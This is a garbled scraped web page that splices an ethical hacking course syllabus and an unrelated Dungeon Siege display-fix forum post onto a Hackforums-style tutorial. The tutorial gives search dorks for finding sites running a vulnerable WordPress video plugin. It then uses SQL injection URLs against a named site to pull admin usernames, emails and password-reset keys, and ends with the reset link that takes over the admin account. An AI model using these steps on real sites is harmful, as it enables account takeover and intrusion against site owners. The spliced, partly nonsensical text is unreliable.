Shop Admin Hacking Tutorial Site
Hello friends in my previous class of How to hack websites, there i explained the various topics that we will cover in hacking classes. Let’s today start with the first topic Hacking Websites using SQL injection tutorial. If you have missed the previous hacking class don’t worry read it here.
Originally posted by:If you're encountering an offset game screen when changing the resolution, the cause of that seems to be the Windows 10 screen scaling (ie: Display 125% of normal).I was able to fix this offset in one of two ways: either set the Windows Display Settings scaling to 100%, or locate the DungeonSiege.exe - right click to open the File Properties, go to the Compatibility tab and select the Change high DPI settings box. 
Next set Override high DPI scaling behaviour and set it to Application. Thanks for looking into it, gonna add it to my document.
Training Summary
An Ethical Hacker exposes vulnerabilities in software to help business owners fix those security holes before a malicious hacker discovers them. In this course, you learn all about Ethical hacking with loads of live hacking examples to make the subject matter clear.What should I know?
Nothing! This is an absolute beginner guide to Ethical hacking.Course Syllabus
| Tutorial | What is Hacking? |
| Tutorial | Potential Security Threats To Your Computer Systems |
| Tutorial | Skills Required to Become a Ethical Hacker |
| Tutorial | Top 20 Ethical Hacking Tools |
| Tutorial | How to hack using Social Engineering |
| Tutorial | How to make your data safe using Cryptography |
| Tutorial | How to crack password of an Application |
| Tutorial | Learn everything about Trojans, Viruses, and Worms |
| Tutorial | Learn ARP Poisoning with Examples |
| Tutorial | Wireshark Tutorial: Network & Passwords Sniffer |
| Tutorial | How to hack wireless networks |
| Tutorial | Ultimate guide to DoS(Denial of Service) Attacks |
| Tutorial | BEST DDoS Attack Tools |
| Tutorial | How to Hack a Web Server |
| Tutorial | How to Hack a Website |
| Tutorial | Learn SQL Injection with practical example |
| Tutorial | Hacking Linux Systems |
| Tutorial | CISSP Certification Guide: What is, Prerequisites, Cost, CISSP Salary |
| Tutorial | What is Digital Forensics? History, Process, Types, Challenges |
| Tutorial | What is Cybercrime? Types, Tools, Examples |
| Tutorial | 10 Most Common Web Security Vulnerabilities |
| Tutorial | Top 30 Bug Bounty Programs |
| Tutorial | 40 Best Penetration Testing (Pen Testing) Tools |
| Tutorial | Kali Linux Tutorial: What is, Install, Utilize Metasploit and Nmap |
| Tutorial | 11 Best Wireshark Alternatives |
| Tutorial | 13 BEST Vulnerability Assessment Scanners for Websites, Network |
| Tutorial | Best 16 No-Log VPN |
| Tutorial | 15 BEST Digital Forensic Tools |
| Tutorial | 17 Best IP & Network Scanning Tools |
| Tutorial | 11 Best FREE Firewall Software for Windows |
| Tutorial | Top 25 Ethical Hacking Interview Questions & Answers |
| Tutorial | Top 110 Cyber Security Interview Questions & Answers |
| Tutorial | CompTIA Certification Guide: Career Paths & Study Material |
| Tutorial | Ethical Hacking Tutorial for Beginners PDF |
Check our Live Penetration Testing Project
Dorks
# Dork 1 (config.php)
inurl:”/wp-content/plugins/hd-webplayer/config.php?id=”
# Dork 2 (playlist.php)
inurl:”/wp-content/plugins/hd-webplayer/playlist.php?videoid=”
# Dork 3 (General):
inurl:”/wp-content/plugins/hd-webplayer/”
When you found your site you need to find admin email and username.
I will be using this site for example:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3
When i add ‘ text disappears so it is vulnerable.
NOTE: I will not demonstrate how to SQL inject.
Now we need admin username and email.
We need to inject: Magnificent feast mount and blade.
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Now we have 2 users.
We pick one and copy his email.
Go to the login page of the site.
It is usually here:
And press “Lost your password?”
Now you enter either username or email.
We can enter both so it doesnt matter.
I entered email.
Now when you got:
“Check your e-mail for the confirmation link.”
It means that reset key is successfully sent.
Now we need to get the activation key.
Go back to the syntax you used for extracting email and username and do this:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Voila!
Now we just need to reset it.
wp-login.php?action=rp&key=resetkey&login=username
NOTE: Replace key= & login=
So my link will be:
Enter new password:
Greets: Hackforums (For the tutorial) XL3gi0n Hackers Family Pride